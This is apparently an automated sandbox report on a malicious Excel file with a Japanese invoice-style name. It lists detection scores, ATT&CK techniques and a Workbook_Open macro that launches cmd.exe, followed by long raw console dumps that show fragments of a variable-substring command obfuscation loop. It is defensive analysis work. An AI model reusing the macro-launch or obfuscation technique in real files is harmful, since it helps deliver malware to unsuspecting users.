Loading ...

Analysis Report 634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xls

Overview

General Information

Joe Sandbox Version:24.0.0 Fire Opal
Analysis ID:87288
Start date:31.10.2018
Start time:08:08:38
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 2m 43s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xls
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:9
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal64.expl.winXLS@13/3@0/0
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .xls
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Simulate clicks
  • Number of clicks 102
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

StrategyScoreRangeReportingDetection
Threshold640 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsCommand-Line Interface21Winlogon Helper DLLProcess Injection1Disabling Security Tools1Credential DumpingProcess Discovery1Application Deployment SoftwareData from Local SystemData CompressedData Obfuscation
Replication Through Removable MediaPowerShell1Port MonitorsAccessibility FeaturesProcess Injection1Network SniffingSecurity Software Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumFallback Channels
Drive-by CompromiseScripting2Accessibility FeaturesPath InterceptionDeobfuscate/Decode Files or Information1Input CaptureFile and Directory Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic Protocol
Exploit Public-Facing ApplicationExploitation for Client Execution1System FirmwareDLL Search Order HijackingScripting2Credentials in FilesSystem Information Discovery21Logon ScriptsInput CaptureData EncryptedMultiband Communication

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xlsvirustotal: Detection: 34%Perma Link
Yara signature matchShow sources
Source: 00000008.00000002.1587961229.018E0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000002.1575622489.003C0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1573363401.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1575210257.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1574110051.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1586592723.01250000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000003.1575306060.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1574574233.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000002.1575587396.00150000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exeJump to behavior

System Summary:

barindex
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 4855
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: Commandline size = 4855Jump to behavior
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: 634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xlsOLE, VBA macro line: Sub Workbook_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_OpenName: Workbook_Open
Document contains embedded VBA macrosShow sources
Source: 634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xlsOLE indicator, VBA macros: true
Classification labelShow sources
Source: classification engineClassification label: mal64.expl.winXLS@13/3@0/0
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.LNKJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\HERBBL~1\AppData\Local\Temp\CVR85A0.tmpJump to behavior
Document contains an OLE Workbook stream indicating a Microsoft Excel fileShow sources
Source: 634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xlsOLE indicator, Workbook stream: true
Found command line outputShow sources
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......b............................jA...A..bA...A.(.C......Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.U.s.e.r.s.\.H.e.r.b. .B.l.a.c.k.b.u.r.n.\.D.o.c.u.m.e.n.t.s.>.........P.1.|.1.D.....1...dw..1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......n.............................A..@....A...D.\...\......w..A...1.....m.3...\.c.m.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.1.2.,.1.!. .................A..@....A...D.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......z...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...................................z.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.2. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... ./.C.!.h.o.R.:.*.h.o.R.!.=.!. ..................................Le.4.1..Le.<.1...1. ....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<....................................hOw..A.....C\Ows.`w v$w.Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.H.D.X...X......w..A...1.....H.1...aJ....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.2.,.1.!. ...................A..@....A.H.D.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................2. .=.=. .9.0. .................................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...D.\...\......w..A...1.....3..&........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.1.1.,.1.!. .................A..@....A...D.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.1. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......(...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<......./...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......;.............................A..@....A...D.\...\......w..A...1.....B..B........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.1.4.,.1.!. .................A..@....A...D.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......G...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......M...........................G.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.4. .=.=. .9.0. ...S...........................<.......M................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......Y....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......e...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......l...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......x.............................A..@....A...D.X...X......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.5.,.1.!. ...................A..@....A...D.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5. .=.=. .9.0. .................................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...D.X...X......w..A...1.....$..$........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.5.,.1.!. ...................A..@....A...D.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5. .=.=. .9.0. .................................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.`.D.X...X......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.5.,.1.!. ...................A..@....A.`.D.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5. .=.=. .9.0. .................................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......#...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<......./.............................A..@....A.0.D.\...\......w..A...1.....B..B........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.7.5.,.1.!. .................A..@....A.0.D.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......;...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......A...........................;.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................7.5. .=.=. .9.0. ...G...........................<.......A................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......M....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......Y...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......`...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......l.............................A..@....A...E.\...\......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.7.5.,.1.!. .................A..@....A...E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......x...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......~...........................x.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................7.5. .=.=. .9.0. ...............................<.......~................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.8.D.\...\......w..A...1.....B..B........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.7.5.,.1.!. .................A..@....A.8.D.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................7.5. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...D.\...\......w..A...1.....B..B........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.6.7.,.1.!. .................A..@....A...D.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.7. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......#.............................A..@....A...D.X...X......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.4.,.1.!. ...................A..@....A...D.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<......./...........................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......5.........................../.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................4. .=.=. .9.0. .....;...........................<.......5................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......A....................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......M...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......T...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......`.............................A..@....A...D.X...X......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.7.,.1.!. ...................A..@....A...D.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......l...........................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......r...........................l.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................7. .=.=. .9.0. .....x...........................<.......r................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......~....................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...D.\...\......w..A...1.....".."........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.6.0.,.1.!. .................A..@....A...D.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.0. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...D.\...\......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.1.7.,.1.!. .................A..@....A...D.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.7. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......".............................A..@....A.@.D.\...\......w..A...1.....B..B........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.6.5.,.1.!. .................A..@....A.@.D.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......4...................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.5. .=.=. .9.0. ...:...........................<.......4................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......@....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......L...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......S...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<......._.............................A..@....A.h.E.\...\......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.6.0.,.1.!. .................A..@....A.h.E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......k...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......q...........................k.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.0. .=.=. .9.0. ...w...........................<.......q................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......}....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
